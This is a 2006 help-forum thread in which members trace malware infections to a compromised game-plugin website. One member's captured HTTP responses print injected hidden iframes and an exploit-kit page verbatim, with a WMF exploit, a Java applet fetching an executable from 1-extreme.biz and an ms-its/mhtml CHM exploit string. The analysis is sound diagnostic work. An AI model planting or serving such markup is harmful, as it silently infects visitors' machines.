Server Help

[Confess]

Ok, i went to Purge+'s website, and it fucked my computer up. Both my temporary one, and my main one. My main one is fucked up beyond repair (thanks purge! ) So i'll just have to format that one, however...the temporary one..Whenever I try to load Continuum, I get this "The procedure entry point SetHandleContext could not be located in the dynamic link library Kernal32.dll" When i hit ok, it then says "Couldnt load library WSOCK32.dll".

Other programs also do not want to work, including IE. I managed to get FireFox on it. When I did a spyware removal, it was flustered with spyware. Any help would be appreciated...I also want to try an Anti-Virus if anyone has one that they can give me.

Thanks.
_________________
I know that I myself cannot do anything, that I will fall, and that I am a sinful man, but I know that I can do ANYTHING through God Almighty, whom strengthens me.

[CypherJF]

Soo why are you using IE again?

In either case, my IE security setting is ultra-high, basically doesn't allow any site to do anything without me whitelisting the site as a "trusted" url. Though, I don't really trust it.
_________________
Performance is often the art of cheating carefully. - James Gosling

[Maverick]

[Confess]

Perhaps you can actually give me some advice as to what the fuck I can do? Considering the fact that this has happened twice, obviously something is on the Website/DNS, not necessarily something that he put there, most likely from the DNS or his Host.

[Solo Ace]

Actually, Maverick, look again.

Code: Show/Hide 03/17/06 16:11:46 Browsing http://pbreloaded.net/ Fetching http://pbreloaded.net/ ... GET / HTTP/1.1 Host: pbreloaded.net Connection: close User-Agent: Sam Spade 1.14 HTTP/1.1 200 OK Date: Fri, 17 Mar 2006 15:10:59 GMT Server: Apache/1.3.34 (Unix) PHP/4.3.11 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.7a X-Powered-By: PHP/4.3.11 Set-Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; expires=Sat, 17-Mar-07 15:10:59 GMT; path=/ Set-Cookie: phpbb2mysql_sid=d464034378212de182beaed2aa4f1658; path=/ Connection: close Transfer-Encoding: chunked Content-Type: text/html c4 <iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe> 8d28 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- begin document head -->

Which already looks a little suspicious, now doesn't it?

Let's look at step57.info/traff/index.php:

Code: Show/Hide 03/17/06 16:22:02 Browsing http://step57.info/traff/index.php Fetching http://step57.info/traff/index.php ... GET /traff/index.php HTTP/1.1 Host: step57.info Connection: close User-Agent: MSIE 5.0b1 ( Windows 98) HTTP/1.1 200 OK Date: Fri, 17 Mar 2006 15:21:26 GMT Server: Apache/1.3.33 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0404142202 mod_ssl/2.8.24 OpenSSL/0.9.7e X-Powered-By: PHP/4.4.2 Set-Cookie: s57=1; expires=Sat, 18 Mar 2006 15:21:26 GMT Connection: close Transfer-Encoding: chunked Content-Type: text/html 55c <script type="text/javascript" language="javascript"> hotlog_js="1.0"; hotlog_r=""+Math.random()+"&s=344844&im=1&r="+escape(document.referrer)+"&pg="+ escape(window.location.href); document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N"); </script> <script type="text/javascript" language="javascript1.1"> hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N") </script> <script type="text/javascript" language="javascript1.2"> hotlog_js="1.2"; hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+ (((navigator.appName.substring(0,3)=="Mic"))? screen.colorDepth:screen.pixelDepth)</script> <script type="text/javascript" language="javascript1.3">hotlog_js="1.3"</script> <script type="text/javascript" language="javascript">hotlog_r+="&js="+hotlog_js; document.write("<a href='http://click.hotlog.ru/?344844' target='_top'><img "+ " src='http://hit15.hotlog.ru/cgi-bin/hotlog/count?"+ hotlog_r+"&' border=0 width=1 height=1 alt=HotLog><\/a>") </script> <noscript> <a href="http://click.hotlog.ru/?344844" target="_top"> <img src="http://hit15.hotlog.ru/cgi-bin/hotlog/count?s=344844&im=1" border=0 width=88 height=31 alt="HotLog"></a> </noscript> <iframe src="http://1-extreme.biz/traff.php?adv=13" width=1 height=1></iframe> <iframe src="http://66.235.212.123/~e-dslnet/common/js/calendar/counter.php" width=1 height=1></iframe> 0

Right, so what does this do next to logging some silly stats? Wow, it has more iframes!

Let's look at those!

Code: Show/Hide 03/17/06 16:25:45 Browsing http://1-extreme.biz/traff.php?adv=13 Fetching http://1-extreme.biz/traff.php?adv=13 ... GET /traff.php?adv=13 HTTP/1.1 Host: 1-extreme.biz Connection: close User-Agent: MSIE 5.0b1 ( Windows 98) HTTP/1.1 200 OK Date: Fri, 17 Mar 2006 23:23:23 GMT Server: Apache/2.0.54 (Fedora) X-Powered-By: PHP/5.0.4 Set-Cookie: dial=uniq; expires=Sat, 18 Mar 2006 23:23:23 GMT Content-Length: 1200 Connection: close Content-Type: text/html <html><body> <iframe src="xpl13.wmf" width=1 height=1></iframe> <applet archive="java.jar" code="GetAccess.class" width=1 height=1><param name="ModulePath" value="http://1-extreme.biz/load13_2.exe"></applet> <iframe width=1 height=1 border=0 frameborder=0 src=fillmem13.htm></iframe> <iframe width=1 height=1 border=0 frameborder=0 src=fillmem13.htm></iframe> <iframe width=1 height=1 border=0 frameborder=0 src=fillmem13.htm></iframe> <iframe width=1 height=1 border=0 frameborder=0 src=fillmem13.htm></iframe> <iframe width=1 height=1 border=0 frameborder=0 src=fillmem13.htm></iframe> <iframe width=1 height=1 border=0 frameborder=0 src=fillmem13.htm></iframe> <iframe width=1 height=1 border=0 frameborder=0 src=fillmem13.htm></iframe> <iframe width=1 height=1 border=0 frameborder=0 src=fillmem13.htm></iframe> <iframe width=1 height=1 border=0 frameborder=0 src=bag.htm></iframe> <applet width=1 height=1 ARCHIVE=load13.jar code=Counter></APPLET> <SCRIPT LANGUAGE="JavaScript"> obj = "<object data=\"ms-its:mhtml:file"; obj1 = "://C:\\nosuch.mht!http://1-extreme.biz/13/x.chm::/x.htm\" type=\"text/x-scriptlet\"></object>"; document.write(obj+obj1); </script> </body></html>

I'm not going to waste more of my time on this, but proving Mav wrong was worth it.

Confess, just run Windows update (although I guess you never paid for any software, I think you should still get updated).
Also, check your IE's settings, or use another browser if you want.

I think Purge isn't responsible for this, oh wait.. .well I do.

[Purge]

Huh? I'm just hosted by crossingcentral.com (Blaine0002's server). I also only have 1 PHP index file:

Code: Show/Hide <html> <head> <title>| Purge's Junkyard | ©</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- [styles] --> .style3 {    font-family: "Samba is Dead";    font-size: 36px; } .style4 {    font-size: 12px;    font-family: Verdana;    font-weight: bold; } .style8 {    font-size: 9px;    font-family: Arial, Helvetica, sans-serif;    font-weight: bold; } a:link {    color: #0033FF;    text-decoration: underline; } a:visited {    text-decoration: underline;    color: #0000FF; } a:hover {    text-decoration: none;    color: #333333; } a:active {    text-decoration: underline; } .style9 {    font-family: Verdana;    font-size: 11px; } .style10 {    font-family: Verdana;    font-weight: bold;    font-size: 11px; } </style></head> <body bgcolor=#000000 text=#FFFFF>   <div align="center">    <p class="style3"><font size=+4 color=green >PURGE'S JUNKYARD </font></p>   <p class="style8">: Download Freely :</p></div>     <p align="left" class="style9">--> <b><i>MERVBot Plugins</i></b></p>   <hr size=+2 color=#FFFFFF>   <p align="left"><span class="style4"><li><a href="invasion.rar">Invasion v2.0</a> </span><p><span class="style9"><b>My first ever MERVBot plugin. Invasion is a revamped idea of turf. Once in-game, you must hold all turf flags for 3 minutes to win the jackpot. Jackpot will be advertised every 5 minutes, and handy arena messages are included when player touches a flag and more! After game, the bot posts stats of the round, shipresets, prizes everyone a warp prize, and resets the flag game. A stat box is also displayed showing the winners/losers of the match.</b></p></span>   <p align="left"><span class="style4"><li><a href="custom.rar">Ship Customizer v1.0</a></span> <p><span class="style9"><b>This plugin allows the player to fully customize their ship in-game through buying prizes (upgrades). This provides a unique experience for everyone, no matter what zone it is. Players can buy a ship, trick it out with upgrades, sell it (the worth value of the ship depends on the number of upgrades bought), and have a unique playing experience! </b></span></p>   <p align="left"><span class="style4"><li><a href="teamdm.rar">Team Deathmatch v1.2</a></span><p><span class="style9"><b>Team Deathmatch! It's a race for two teams (Team 0 and 1 <i>only</i>) to see who can get [x] amount of kills. The winning team of the round gets points rewarded to them as a jackpot. Both the jackpot and death count values may be edited via an INI file.</b></span></p>   <p align="left"><span class="style4"><li><a href="db.rar">Dodgeball v1.0</a></span><p><span class="style9"><b>Unlike the original dodgeball plugin, this one legalizes team passing, specs players if they pass over the center line (configurable through INI), and also has a nifty !score feature to track the teams' score. A fun bot to play with (especially in zone events) and a tournament favorite! Look for an updated release with more features soon.</b></span></p>   <p align="left"><span class="style4"><li><a href="ballcount.rar">BallCount v1.0</a></span><p><span class="style9"><b>This plugin allows bot operators of lvl2+ to choose how many balls they can set in the arena. The limit is up to 10 balls since more than that can crash the server.</b></span></p>   <p align="left"><span class="style4"><li><a href="door.zip">Doors v1.0</a></span><p><span class="style9"><b>This plugin allows bot operators of lvl2+ to change the door modes of the arena with a simple command. The door modes changes by the number entered from 0-255!</b></span></p>   <hr size=+2 color=#FFFFFF>     <!-- [page query code] -->   <?php           $stored = "hitlist.txt";              function hitList($stored)       {             $fp = fopen($stored, rw);          $stuff = fgets($fp, 9999);          fclose($fp);          $fp = fopen($stored, w);          $stuff +=1;          print "$stuff";          fputs($fp, $stuff);          fclose($fp);        }   ?>     <center><p class="style10">| If you would like the source to any of the plugins you see up there, please contact me at <a href="mailto:purgey@gmail.com">purgey@gmail.com</a>. |</font></center>     <center><p class="style8">Page Queries: <?php hitList($stored); ?> </p></center>   <p align="center"><img src="notepad.PNG"></p> </body> </html>

I have nothing to do with Confess's computer screwing up... When I visit the site, nothing happens to me.

[Blaine0002-forgotpw]

solo, i dont know where you got that info, but i also host pbreloaded.net which uses the Mkportal script. (probably uses iframes x_X)

nothing is wrong with purges site.

[Confess]

I dont think that this is Purge's site, not at all. I think its the webhosting/DNS. Even with the DNS when it was hosting on our reseller, it was spitting out popups.

Solo:I cant load IE, and thus, Windows Update wont load.

[Blaine0002-forgotpw]

trust me. its not.

Also, my computer works the same as internet explorer, just go to windows update from that.

[Cyan~Fire]

I'd say reinstall windows.
_________________
This help is informational only. No representation is made or warranty given as to its content. User assumes all risk of use. Cyan~Fire assumes no responsibility for any loss or delay resulting from such use.
Wise men STILL seek Him.

[Purge]

Well, I switched over to Contempt's server now and everything seems to be running fine.

I got this motive by Tweezy claiming to have gotten a trojan by visiting the site.

[Solo Ace]

Something was actually wrong with Purge's site.

I wanted to go over this this last night, I was just too tired.

If you looked at http://crossingcentral.com/purge (which is now an empty dir) you could've seen the following:

Code: Show/Hide       <center><p class="style8">Page Queries: 282 </p></center>   <p align="center"><img src="http://www.rshl.org/bak/notepad.PNG"></p> </body> </html> <iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe>

I'm not sure what could put these iframes on the bottom.

Blaine, why won't you believe what I say? Open pbreloaded.net/ in Firefox (or IE, if you dare) and check the source of the page.

Wtf yesterday step57.info didn't have an index page (just Apache's directory listing), but whatever...

Read about the same problem here and here.

Also, check this out!

Well, anyways, if this happened to me I'd start all over again on another host. I'd check or rewrite all my code, and not trust any of the "web portal software" (or whatever) anymore.

Check your permissions! Lock your pages!

[Purge]

Yeah, I switched hosts. I guess something on the server input all those iframes on the file. I personally despise iframes.

[blaine0002-forgotpw]

augh, thank god im switching hosting in a few days. this is starting to piss me off.

[blaine0002-forgotpw]

anyone know if
http://www.globat.com/
is any good?

[Confess]

I donno, but try ZoneServ.com.

[D1st0rt]

[Tweezy]

lol @ d1. i love u man.

anywho...yeah what happened is i went to purge's site yesterday (3-19) and norton said a trojan was attempting to load. then my windows all locked up and a java prompt asked me for something.